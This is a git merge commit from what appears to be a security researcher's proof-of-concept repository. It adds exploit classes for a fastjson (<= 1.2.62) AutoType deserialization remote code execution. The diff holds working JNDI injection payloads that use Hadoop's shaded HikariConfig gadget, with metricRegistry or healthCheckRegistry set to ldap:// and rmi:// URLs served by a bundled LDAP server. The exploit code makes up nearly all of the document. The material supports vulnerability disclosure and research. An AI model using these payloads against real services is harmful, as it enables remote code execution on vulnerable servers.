Merge branch 'feat/new-hadoop-hikari-gadget-fastjson'

“threedr3am” · “threedr3am” · commit 23b2ae74c35e · 2020-03-03T14:06:42.000+08:00
# Conflicts:
#	fastjson/pom.xml
diff --git a/fastjson/pom.xml b/fastjson/pom.xml
@@ -81,5 +81,12 @@
       <artifactId>Anteros-DBCP</artifactId>
       <version>1.0.1</version>
     </dependency>
+
+    <!-- https://mvnrepository.com/artifact/org.apache.hadoop/hadoop-client-minicluster -->
+    <dependency>
+      <groupId>org.apache.hadoop</groupId>
+      <artifactId>hadoop-client-minicluster</artifactId>
+      <version>3.2.1</version>
+    </dependency>
   </dependencies>
 </project>
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/HadoopHikariPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/HadoopHikariPoc.java
@@ -0,0 +1,34 @@
+package com.threedr3am.bug.fastjson;
+
+import com.alibaba.fastjson.JSON;
+import com.alibaba.fastjson.parser.ParserConfig;
+import com.threedr3am.bug.common.server.LdapServer;
+
+/**
+ * fastjson <= 1.2.62 RCE，需要开启AutoType (report by threedr3am to ASRC)
+ *
+ * <dependency>
+ *       <groupId>org.apache.hadoop</groupId>
+ *       <artifactId>hadoop-client-minicluster</artifactId>
+ *       <version>3.2.1</version>
+ * </dependency>
+ *
+ * @author threedr3am
+ */
+public class HadoopHikariPoc {
+  static {
+    //rmi server示例
+//    RmiServer.run();
+
+    //ldap server示例
+    LdapServer.run();
+  }
+
+  public static void main(String[] args) {
+    ParserConfig.getGlobalInstance().setAutoTypeSupport(true);
+
+    String payload = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
+    String payload2 = "{\"@type\":\"org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
+    JSON.parse(payload);
+  }
+}
diff --git a/fastjson/src/main/java/com/threedr3am/bug/fastjson/HikariConfigPoc.java b/fastjson/src/main/java/com/threedr3am/bug/fastjson/HikariConfigPoc.java
@@ -33,7 +33,9 @@ public static void main(String[] args) {
     ParserConfig.global.setAutoTypeSupport(true);
 
 //    String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";
+//    String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"rmi://localhost:43657/Calc\"}";
     String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";
+    String payload2 = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";
     JSON.parse(payload);
   }
 }

Original file line number	Diff line number	Diff line change
`@@ -33,7 +33,9 @@ public static void main(String[] args) {`
`33`	`33`	`ParserConfig.global.setAutoTypeSupport(true);`
`34`	`34`
`35`	`35`	`// String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"rmi://localhost:43657/Calc\"}";`
	`36`	`+// String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"rmi://localhost:43657/Calc\"}";`
`36`	`37`	`String payload = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}";`
	`38`	`+ String payload2 = "{\"@type\":\"com.zaxxer.hikari.HikariConfig\",\"healthCheckRegistry\":\"ldap://localhost:43658/Calc\"}";`
`37`	`39`	`JSON.parse(payload);`
`38`	`40`	`}`
`39`	`41`	`}`